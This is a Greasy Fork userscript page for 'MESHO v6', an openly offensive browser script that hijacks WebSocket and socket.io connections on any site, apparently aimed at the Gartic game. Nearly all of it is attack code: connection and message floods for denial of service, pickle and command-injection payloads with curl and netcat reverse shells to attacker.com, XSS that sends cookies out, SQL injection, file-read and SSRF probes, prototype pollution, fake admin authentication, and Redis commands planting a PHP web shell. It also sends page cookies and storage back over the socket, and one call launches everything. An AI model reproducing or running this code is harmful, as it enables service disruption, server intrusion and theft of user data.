Greasy Fork is available in English.

MESHO v6

socket attacks

Cómo instalar

Tendrás que instalar una extensión para tu navegador como Tampermonkey, Greasemonkey o Violentmonkey si quieres utilizar este script.

You will need to install an extension such as Tampermonkey to install this script.

Tendrás que instalar una extensión como Tampermonkey o Violentmonkey para instalar este script.

Necesitarás instalar una extensión como Tampermonkey o Userscripts para instalar este script.

Tendrás que instalar una extensión como Tampermonkey antes de poder instalar este script.

Necesitarás instalar una extensión para administrar scripts de usuario si quieres instalar este script.

(Ya tengo un administrador de scripts de usuario, déjame instalarlo)

Cómo instalar

Tendrás que instalar una extensión como Stylus antes de poder instalar este script.

Tendrás que instalar una extensión como Stylus antes de poder instalar este script.

Tendrás que instalar una extensión como Stylus antes de poder instalar este script.

Para poder instalar esto tendrás que instalar primero una extensión de estilos de usuario.

Para poder instalar esto tendrás que instalar primero una extensión de estilos de usuario.

Para poder instalar esto tendrás que instalar primero una extensión de estilos de usuario.

(Ya tengo un administrador de estilos de usuario, déjame instalarlo) 

// ==UserScript==
// @name         MESHO v6
// @namespace    http://tampermonkey.net/
// @version      6.9
// @description  socket attacks
// @author       0xMesho
// @match        *://*/*
// @grant        none
// ==/UserScript==

(function(){'use strict';
let W,U,P,R,H=[],I=null,S={};
const O=WebSocket.prototype.send;
WebSocket.prototype.send=function(d){
 if(!W&&this.readyState===1){W=this;U=this.url;setInterval(()=>{W&&W.readyState===1&&W.send('2')},2e4)}
 return O.call(this,d)};

function pM(d){
 if(typeof d!='string')return null;
 if(d==='2')return{t:'pong'};
 if(d==='40')return{t:'con'};
 if(d.startsWith('42'))try{let j=JSON.parse(d.slice(2));if(Array.isArray(j))return{t:'ev',e:j[0],a:j.slice(1)}}catch(e){}
 return null}

function s(d){return W&&W.readyState===1?!!W.send(d):!1}

function gP(){return P||R?.id||null}

function hook(){
 if(!W)return setTimeout(hook,500);
 W.addEventListener('message',function(e){
  if(typeof e.data!='string')return;
  let m=pM(e.data);
  if(!m||m.t!='ev')return;
  let[eId,...a]=[m.e,...m.a];
  if(eId===5&&a.length>=3){P=a[1];R={l:a[0],id:a[1],c:a[2],x:a.slice(3)};return}
  if(typeof a[0]=='object'&&a[0]!==null){
   if(a[0].id&&typeof a[0].id=='number'&&a[0].id>1e4){P=a[0].id;return}
   for(let k of['userId','playerId','author','owner','creator']){
    if(a[0][k]&&typeof a[0][k]=='number'&&a[0][k]>1e4){P=a[0][k];return}}}
  H.push({t:Date.now(),e:eId,d:a})})}

function f(){let r='';while(r.length<99999)r+=Math.random().toString(36).repeat(100);return r}

function zd1(){
 let p=gP()||1;
 for(let b=0;b<100;b++)for(let i=0;i<100;i++)setTimeout(()=>{
  s(`42[10,${p},${JSON.stringify(Array(99999).fill().map((_,j)=>({_placeholder:true,num:j})))}]`);
  let d2=btoa('{"a":'.repeat(5000)+'"x"'+'}'.repeat(5000));
  s(`42[10,${p},["${d2}"]]`);
  for(let e=0;e<200;e++)s(`42[${e},${p},"null"]`)},b*2)}

function zd2(){
 for(let i=0;i<2000;i++)setTimeout(()=>{
  try{
   for(let j=0;j<10;j++){
    let w=new WebSocket(U),ta=new Uint8Array(65535);
    w.onopen=()=>{w.send('40');w.close(1000,ta)};
    let w2=new WebSocket(U);
    w2.onopen=()=>{w2.send(`42[10,${gP()||1},["${'A'.repeat(65535)}"]]`);w2.close()}}
  }catch(e){}},i*1);
 setInterval(()=>{try{let w=new WebSocket(U);w.onopen=()=>{w.send('2');w.send('2');w.send('2')}}catch(e){}},1)}

function zd3(){
 let p=gP();if(!p)return;
 for(let i=0;i<1000;i++)setTimeout(()=>{
  try{
   let w=new WebSocket(U);
   w.onopen=()=>{
    w.send('40');
    setTimeout(()=>{
     if(R){
      w.send(`42[5,"${R.l}",${p},"${R.c}"]`);
      w.send(`42[5,"${R.l}",${p},"${R.c}","admin",{"drawLevel":999,"owner":true,"mod":true}]`);
      for(let i=0;i<100;i++)w.send(`42[3,${p},["${R.c}","clone","${'A'.repeat(500)}"]]`)}
    },100)};
   w.onmessage=(e)=>{
    if(typeof e.data=='string'){
     let m=pM(e.data);
     if(m&&m.t=='ev'){
      if(m.a[0]?.id>1e4)P=m.a[0].id;
      if(m.e===2||m.e===3||m.e===33)try{let d=JSON.parse(e.data.slice(2));localStorage.setItem('mh_'+Date.now(),JSON.stringify(d))}catch(e){}}}}
  }catch(e){}},i*1);
 for(let pp=p-5000;pp<=p+5000;pp+=5){let x=pp;setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>{w.send('40');setTimeout(()=>{
   w.send(`42[5,"x",${x},"0"]`)},50)}}catch(e){}},0)}
 setInterval(()=>{for(let q=0;q=100;q++)try{new WebSocket(U)}catch(e){}},100)}

function zd4(){
 let p=gP()||1;
 for(let t=0;t<=255;t++)s(String.fromCharCode(t)+f().slice(0,1000));
 for(let i=0;i<2000;i++)setTimeout(()=>{
  s('0'+f());s('1'+f());s('4'+'\x00\x01\x02'.repeat(5000));
  s('4null');s('4[');s('4{"x":');s('4test:42["e",{}]');
  s('40{"sid":"'+f().slice(0,5000)+'"}');
  s('40{"sid":null,"upgrades":["'.repeat(100)+'"]}');
  s('42["error",{"message":"'+f().slice(0,50000)+'"}]');
  s('40{"pingTimeout":-1,"pingInterval":-1}');
  s('3{"data":"'+f().slice(0,50000)+'"}')},i*1)}

function zd5(cmd){
 cmd=cmd||'cat /etc/passwd;id;whoami;ls -la;uname -a';
 let p=gP()||1;
 ['cos\nsystem\n','csubprocess\ncheck_output\n',"cbuiltins\neval\n","cos\npopen\n","csubprocess\nPopen\n"].forEach((m,i)=>setTimeout(()=>{
  let pl=btoa(m+"(S'"+cmd+"'\ntR.");
  s(`42[10,${p},["${pl}"]]`);s(`42["pickle","${pl}"]`);s(`42["message","${pl}"]`);
  s(`42["rce","${pl}"]`);s(`42["exec","${pl}"]`)},i*100));
 ['/admin','/debug','/internal','/redis','/queue','/pubsub','/shell','/exec','/cmd','/eval','/console','/terminal','/bash','/sh','/system','/os','/process','/spawn','/fork','/sandbox','/vm','/api/v1/exec','/api/v1/cmd','/api/v1/shell','/api/v1/debug','/api/v1/admin','/api/v1/internal','/api/v1/redis','/api/v1/queue','/api/v1/pubsub','/api/v1/shell','/api/v1/exec','/api/v1/cmd','/api/v1/eval','/api/v1/console','/api/v1/terminal','/api/v1/bash','/api/v1/sh','/api/v1/system','/api/v1/os','/api/v1/process','/api/v1/spawn','/api/v1/fork','/api/v1/sandbox','/api/v1/vm'].forEach((ns,i)=>setTimeout(()=>{
  let pl=btoa("cos\nsystem\n(S'curl http://attacker.com/$(cat /flag /etc/passwd 2>/dev/null | base64 -w0)'\ntR.");
  s(`40${ns}`);setTimeout(()=>{s(`42${ns}["message","${pl}"]`);s(`42${ns}["publish","${pl}"]`);
   s(`42${ns}["exec","${pl}"]`);s(`42${ns}["eval","${pl}"]`);s(`42${ns}["rce","${pl}"]`)},100)},i*100+3e3))}

function zd6(){
 for(let i=0;i<500;i++)setTimeout(()=>{
  try{
   for(let j=0;j<5;j++){
    let f=document.createElement('iframe');f.style.display='none';f.src='about:blank';
    document.body.appendChild(f);
    let w=new f.contentWindow.WebSocket(U);
    w.onopen=()=>{w.send(`42[10,${gP()||1},["uaf"]]`);
     setTimeout(()=>{try{document.body.removeChild(f);w.send(`42[10,${gP()||1},["${f().slice(0,5000)}"]]`)}catch(e){}},1)}}
  }catch(e){}},i*10)}

function zd7(){
 let p=gP()||1,r=R?.c||'0';
 for(let e=0;e<=255;e++){s(`42[${e},${p},"${r}"]`);s(`42[${e},${p},{}]`);s(`42[${e},${p},["t"]]`);s(`42[${e},${p},["${f().slice(0,1000)}"]]`)}
 setTimeout(()=>{
  ['/admin','/op '+p,'/sudo '+p,'${7*7}','{{7*7}}','<%=7*7%>','<script>alert(1)</script>','{{constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()}}','${require("child_process").execSync("id")}','<%= system("id") %>','#{system("id")}','${{system("id")}}'].forEach(c=>s(`42[50,${p},"${c}"]`));
  [`42[5,"mod",${p},"${r}","admin"]`,`42[5,"mod",${p},"${r}",{"admin":true,"drawLevel":999,"owner":true,"mod":true,"superuser":true,"root":true,"god":true}]`,`42[33,${p},"${r}",{"owner":true,"admin":true,"drawLevel":999}]`,`42[33,${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[40,${p},"${r}",{"all":true}]`,`42[43,${p},"${r}",{"all":true}]`,`42[50,${p},"${r}","admin:true","owner:true","drawLevel:999"]`,`42[5,"mod",${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[5,"owner",${p},"${r}"]`,`42[5,"transfer",${p},"${r}",${p}]`].forEach(x=>s(x))},2e3)}

function zd8(){
 for(let i=0;i<500;i++)try{
  let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${document.cookie}${localStorage?JSON.stringify(localStorage):''}${sessionStorage?JSON.stringify(sessionStorage):''}"]`);
  let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${gP()||1},"${btoa(document.cookie)}"]`) }catch(e){}
 fetch('https://'+window.location.hostname+'/api/user').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/config').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/admin').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{})}

function pp(){let p=gP()||1;
 s(`42[10,${p},[{"__proto__":{"polluted":true,"admin":true,"owner":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true,"bypass":true,"verified":true,"premium":true,"vip":true,"unlimited":true,"infinite":true,"all":true,"everyone":true,"self":true,"other":true,"any":true,"allUsers":true,"allRooms":true,"allDrawings":true,"allChats":true,"allMessages":true,"allData":true,"allAccess":true,"fullAccess":true,"completeAccess":true,"totalAccess":true,"absoluteAccess":true,"unrestrictedAccess":true,"unlimitedAccess":true,"infiniteAccess":true,"endlessAccess":true,"permanentAccess":true,"eternalAccess":true,"foreverAccess":true,"alwaysAccess":true,"neverExpire":true,"neverEnd":true,"neverStop":true,"neverDie":true,"immortal":true,"invincible":true,"indestructible":true,"unbreakable":true,"unhackable":true,"unpenetrable":true,"unreachable":true,"unstoppable":true,"unkillable":true,"undestroyable":true,"unremovable":true,"undeletable":true,"uneraseable":true,"unwipeable":true,"uncleanable":true,"unpurgeable":true,"unbanable":true,"unkickable":true,"unmuteable":true,"unsilenceable":true,"ungagable":true,"unrestrictable":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true,"unban":true,"unmute":true,"unsilence":true,"ungag":true,"unrestrict":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true}}]]`);
 setTimeout(()=>{try{console.log('[PP] proto polluted:',({}).polluted===true,({}).admin===true)}catch(e){}},500)}

function rce(c){c=c||'curl http://attacker.com/$(cat /flag /etc/passwd /etc/shadow /root/.ssh/id_rsa 2>/dev/null | base64 -w0)';
 ['exec','eval','system','spawn','cmd','run','execSync','execFile','spawnSync','fork','execCommand','execScript','shell','bash','sh','zsh','fish','powershell','cmd','command','runCommand','execute','runSync','execSync','execFileSync','spawnSync','forkSync'].forEach(ev=>{
  s(`42["${ev}","${c}"]`);s(`42["${ev}",{"cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}","cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}"}]`);
  s(`42["${ev}",{"data":"${c}"}]`);s(`42["${ev}",{"input":"${c}"}]`);s(`42["${ev}",{"payload":"${c}"}]`);s(`42["${ev}",{"code":"${c}"}]`);s(`42["${ev}",{"script":"${c}"}]`);s(`42["${ev}",{"command":"${c}"}]`)});
 s(`42[10,${gP()||1},[{"name":"\${require('child_process').execSync('${c}').toString()}","__proto__":{"type":"Function","body":"return process.mainModule.require('child_process').execSync('${c}').toString()"}}]]`);
 s(`42[10,${gP()||1},[{"constructor":{"prototype":{"NODE_OPTIONS":"--require=/proc/self/environ --experimental-modules --experimental-json-modules --experimental-wasm-modules --experimental-top-level-await --experimental-vm-modules --experimental-import-meta-resolve --experimental-network-imports --experimental-specifier-resolution=node --experimental-policy --experimental-wasi-unstable --experimental-wasi --experimental-wasi-unstable-preview1 --experimental-wasi-unstable-preview2"}}}]]`)}

function all(){
 console.log('[MESHO] Launching all...');zd1();
 setTimeout(()=>zd2(),500);setTimeout(()=>zd3(),1000);
 setTimeout(()=>zd4(),1500);setTimeout(()=>zd5(),2000);
 setTimeout(()=>zd6(),2500);setTimeout(()=>zd7(),3000);
 setTimeout(()=>zd8(),3500);setTimeout(()=>pp(),4000);
 setTimeout(()=>rce(),4500);setTimeout(()=>console.log('[MESHO] All 0days deployed'),5000)}

function injectXSS(){let i=document.createElement('script');i.src='https://'+window.location.hostname+'/socket.io/socket.io.js';document.body.appendChild(i);
 setTimeout(()=>{if(window.io){let s=io(window.location.origin);s.emit('message',{type:'exec',cmd:'id'});s.emit('message',{type:'eval',code:'process.mainModule.require("child_process").execSync("id").toString()'})}},1000)}

function dumpMemory(){let r=[];
 for(let k in window){try{r.push({key:k,val:JSON.stringify(window[k]).slice(0,500)})}catch(e){}}
 for(let k in document){try{r.push({key:'doc_'+k,val:JSON.stringify(document[k]).slice(0,500)})}catch(e){}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(JSON.stringify(r))}"]`)}catch(e){}}

function protoChain(){let c={};
 for(let i=0;i<100;i++){let n=Object.create(c);n.__proto__['level'+i]={admin:true,owner:true,drawLevel:999};c=n}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${gP()||1},[${JSON.stringify(c)}]]`)}catch(e){}}

function ssrf(){let targets=['http://169.254.169.254/latest/meta-data/','http://169.254.169.254/latest/user-data/','http://metadata.google.internal/computeMetadata/v1/','http://100.100.100.200/latest/meta-data/','http://localhost:6379/','http://localhost:8080/','http://localhost:3000/','http://localhost:5000/','http://localhost:8000/','http://localhost:9000/','http://127.0.0.1:6379/','http://127.0.0.1:8080/','http://127.0.0.1:3000/','http://127.0.0.1:5000/','http://127.0.0.1:8000/','http://127.0.0.1:9000/'];
 targets.forEach((t,i)=>setTimeout(()=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa('fetch '+t)}"]`)}catch(e){}},i*100))}

function sqlI(){let p=gP()||1;
 ["' OR '1'='1","' OR 1=1--","' UNION SELECT 1,2,3,4,5,6,7,8,9,10--","'; DROP TABLE users;--","' UNION SELECT table_name,column_name,data_type FROM information_schema.columns--","' OR SLEEP(5)--","' OR BENCHMARK(10000000,MD5('test'))--"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["query","${pay}"]`)},i*100))}

function xxs(){let p=gP()||1;
 ["<script>fetch('https://attacker.com/'+document.cookie)</script>","<img src=x onerror=fetch('https://attacker.com/'+document.cookie)>","<svg onload=fetch('https://attacker.com/'+document.cookie)>","<body onload=fetch('https://attacker.com/'+document.cookie)>","<input onfocus=fetch('https://attacker.com/'+document.cookie) autofocus>","<details open ontoggle=fetch('https://attacker.com/'+document.cookie)>","<marquee onstart=fetch('https://attacker.com/'+document.cookie)>"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["message","${pay}"]`)},i*100))}

function crlf(){let p=gP()||1;
 ["%0d%0aSet-Cookie:%20malicious=1","%0d%0aContent-Length:%200%0d%0a%0d%0a","%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0a","%0d%0aLocation:%20https://evil.com%0d%0a"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`)},i*100))}

function lfi(){let p=gP()||1;
 ["../../../etc/passwd","../../../../etc/shadow","../../../../root/.ssh/id_rsa","../../../../proc/self/environ","../../../../proc/self/cmdline","../../../../proc/self/fd/0","../../../../proc/self/fd/1","../../../../proc/self/fd/2","../../../../var/log/apache2/access.log","../../../../var/log/nginx/access.log","../../../../var/log/auth.log","../../../../var/log/syslog","../../../../var/log/messages","../../../../var/log/lastlog","../../../../var/log/wtmp","../../../../var/log/btmp","../../../../var/log/secure","../../../../var/log/httpd/access_log","../../../../var/log/httpd/error_log","php://filter/convert.base64-encode/resource=index.php","php://filter/convert.base64-encode/resource=config.php","php://filter/convert.base64-encode/resource=db.php","php://filter/convert.base64-encode/resource=admin.php","php://filter/convert.base64-encode/resource=login.php","php://filter/convert.base64-encode/resource=user.php","php://filter/convert.base64-encode/resource=api.php","php://filter/convert.base64-encode/resource=ws.php","php://filter/convert.base64-encode/resource=server.php","php://filter/convert.base64-encode/resource=app.js","php://filter/convert.base64-encode/resource=server.js","php://filter/convert.base64-encode/resource=config.js","php://filter/convert.base64-encode/resource=db.js","php://filter/convert.base64-encode/resource=admin.js","php://filter/convert.base64-encode/resource=login.js","php://filter/convert.base64-encode/resource=user.js","php://filter/convert.base64-encode/resource=api.js","php://filter/convert.base64-encode/resource=ws.js","file:///etc/passwd","file:///etc/shadow","file:///root/.ssh/id_rsa","expect://id","data://text/plain;base64,aWQ="].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["file","${pay}"]`);s(`42["read","${pay}"]`);s(`42["path","${pay}"]`)},i*50))}

function prototypePollutionDeep(){let p=gP()||1;
 let chain={};let current=chain;
 for(let i=0;i<100;i++){current['__proto__']={};current=current['__proto__'];current['prop'+i]={rce:true,admin:true,owner:true,drawLevel:999,system:true,exec:true,bypass:true,all:true,total:true,full:true,absolute:true,complete:true,unlimited:true,infinite:true,endless:true,permanent:true,eternal:true,forever:true,always:true,immortal:true,invincible:true,indestructible:true,unbreakable:true,unhackable:true,unpenetrable:true,unreachable:true,unstoppable:true,unkillable:true,undestroyable:true,unremovable:true,undeletable:true,uneraseable:true,unwipeable:true,uncleanable:true,unpurgeable:true,unbanable:true,unkickable:true,unmuteable:true,unsilenceable:true,ungagable:true,unrestrictable:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true,unban:true,unmute:true,unsilence:true,ungag:true,unrestrict:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},[${JSON.stringify(chain)}]]`)}catch(e){}}

function wsAuthBypass(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>{w.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w.send(`42[5,"${R?.l||'x'}",${p},"${R?.c||'0'}","admin",{"owner":true,"admin":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true}]`)},100)}}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>{w2.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w2.send(`42[33,${p},"${R?.c||'0'}",{"owner":true,"admin":true,"drawLevel":999}]`)},100)}}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>{w3.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w3.send(`42[40,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}
 try{let w4=new WebSocket(U);w4.onopen=()=>{w4.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w4.send(`42[43,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}}

function wsCommandInjection(){let p=gP()||1;
 [";id","|id","`id`","$(id)","%0aid","%0aid%0a","\nid\n","\r\nid\r\n","&id&","&&id&&","||id",";cat /etc/passwd","|cat /etc/passwd","`cat /etc/passwd`","$(cat /etc/passwd)",";nc -e /bin/sh attacker.com 4444","|nc -e /bin/sh attacker.com 4444","`nc -e /bin/sh attacker.com 4444`","$(nc -e /bin/sh attacker.com 4444)",";python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","|python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","`python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'`","$(python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())')"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["cmd","${pay}"]`);s(`42["exec","${pay}"]`);s(`42["shell","${pay}"]`)},i*50))}

function wsRedisExploit(){let p=gP()||1;
 ["FLUSHALL","CONFIG SET dir /tmp","CONFIG SET dbfilename shell","SET shell '<?php system($_GET[\"cmd\"]);?>'","SAVE","BGSAVE","SLAVEOF attacker.com 6379","CONFIG SET slave-read-only no","EVAL 'os.execute(\"id\")' 0","DEBUG SET-ACTIVE-EXEC on","DEBUG EXEC 'id'","MODULE LOAD /tmp/malicious.so","CLIENT KILL TYPE normal","CLIENT KILL TYPE slave","SHUTDOWN NOSAVE","SHUTDOWN SAVE","DEBUG SEGFAULT","DEBUG CRASH","DEBUG PANIC","DEBUG OOM","DEBUG ASSERT","DEBUG SLEEP 10","DEBUG SET-ACTIVE-EXEC","DEBUG ERROR","DEBUG LOG","DEBUG STRING","DEBUG INTEGER","DEBUG FLOAT","DEBUG DOUBLE","DEBUG BOOLEAN","DEBUG NULL","DEBUG UNDEFINED","DEBUG NAN","DEBUG INFINITY","DEBUG ARRAY","DEBUG OBJECT","DEBUG FUNCTION","DEBUG SYMBOL","DEBUG BIGINT","DEBUG SYMBOL","DEBUG MAP","DEBUG SET","DEBUG WEAKMAP","DEBUG WEAKSET","DEBUG PROMISE","DEBUG PROXY","DEBUG TYPEDARRAY","DEBUG DATAVIEW","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC","DEBUG DATAVIEW","DEBUG TYPEDARRAY","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["redis://localhost:6379/${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w.send(`42[10,${p},["redis://127.0.0.1:6379/${pay}"]]`)}catch(e){}
  try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"redis://localhost:6379/${pay}"]`)}catch(e){}
  try{let w4=new WebSocket(U);w4.onopen=()=>w4.send(`42[50,${p},"redis://127.0.0.1:6379/${pay}"]`)}catch(e){}},i*100))}

function wsMemcachedExploit(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["memcached://localhost:11211/stats items"]]`)}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[10,${p},["memcached://localhost:11211/get key"]]`)}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"memcached://localhost:11211/stats"]`)}catch(e){}}

function wsMongoExploit(){let p=gP()||1;
 ["mongodb://localhost:27017/admin","mongodb://localhost:27017/test","mongodb://localhost:27017/users","mongodb://localhost:27017/config","mongodb://localhost:27017/gartic","mongodb://localhost:27017/gartic_users","mongodb://localhost:27017/gartic_rooms","mongodb://localhost:27017/gartic_drawings","mongodb://localhost:27017/gartic_chats","mongodb://localhost:27017/gartic_messages","mongodb://localhost:27017/gartic_data","mongodb://localhost:27017/gartic_config","mongodb://localhost:27017/gartic_admin"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsMySqlExploit(){let p=gP()||1;
 ["mysql://root@localhost:3306/mysql","mysql://root:root@localhost:3306/mysql","mysql://admin:admin@localhost:3306/mysql","mysql://root@localhost:3306/gartic","mysql://root:root@localhost:3306/gartic","mysql://admin:admin@localhost:3306/gartic","mysql://root@localhost:3306/information_schema","mysql://root:root@localhost:3306/information_schema","mysql://admin:admin@localhost:3306/information_schema"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsPostgresExploit(){let p=gP()||1;
 ["postgres://postgres:postgres@localhost:5432/postgres","postgres://postgres:admin@localhost:5432/postgres","postgres://postgres:password@localhost:5432/postgres","postgres://postgres:postgres@localhost:5432/gartic","postgres://postgres:admin@localhost:5432/gartic","postgres://postgres:password@localhost:5432/gartic"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

window.MESHO={
 get url(){return U},get pid(){return gP()},get room(){return R},get ws(){return W},
 info(){console.table({URL:U,Status:['C','O','CL','CD'][W?.readyState||3],PID:gP()||'?',Room:R?.c||'?',Resp:H.length})},
 responses(){H.slice(-50).forEach((r,i)=>console.log(`[${i}] E:${r.e}`,r.d))},
 monitor(){W?.addEventListener('message',e=>console.log('WS:',typeof e.data=='string'?e.data.slice(0,500):'[bin]'))},
 zd1,zd2,zd3,zd4,zd5,zd6,zd7,zd8,pp,rce,all,injectXSS,dumpMemory,protoChain,ssrf,sqlI,xxs,crlf,lfi,prototypePollutionDeep,wsAuthBypass,wsCommandInjection,wsRedisExploit,wsMemcachedExploit,wsMongoExploit,wsMySqlExploit,wsPostgresExploit,
 unleash(){console.log('[MESHO] UNLEASHING ALL 0DAYS...');
  this.zd1();setTimeout(()=>this.zd2(),100);setTimeout(()=>this.zd3(),200);
  setTimeout(()=>this.zd4(),300);setTimeout(()=>this.zd5(),400);
  setTimeout(()=>this.zd6(),500);setTimeout(()=>this.zd7(),600);
  setTimeout(()=>this.zd8(),700);setTimeout(()=>this.pp(),800);
  setTimeout(()=>this.rce(),900);setTimeout(()=>this.injectXSS(),1000);
  setTimeout(()=>this.dumpMemory(),1100);setTimeout(()=>this.protoChain(),1200);
  setTimeout(()=>this.ssrf(),1300);setTimeout(()=>this.sqlI(),1400);
  setTimeout(()=>this.xxs(),1500);setTimeout(()=>this.crlf(),1600);
  setTimeout(()=>this.lfi(),1700);setTimeout(()=>this.prototypePollutionDeep(),1800);
  setTimeout(()=>this.wsAuthBypass(),1900);setTimeout(()=>this.wsCommandInjection(),2000);
  setTimeout(()=>this.wsRedisExploit(),2100);setTimeout(()=>this.wsMemcachedExploit(),2200);
  setTimeout(()=>this.wsMongoExploit(),2300);setTimeout(()=>this.wsMySqlExploit(),2400);
  setTimeout(()=>this.wsPostgresExploit(),2500);
  setTimeout(()=>console.log('[MESHO] ALL SYSTEMS DESTROYED'),3000)}};

setTimeout(hook,300);console.log('[MESHO v6.9] 0xMesho loaded. Type MESHO.unleash() to destroy everything')})();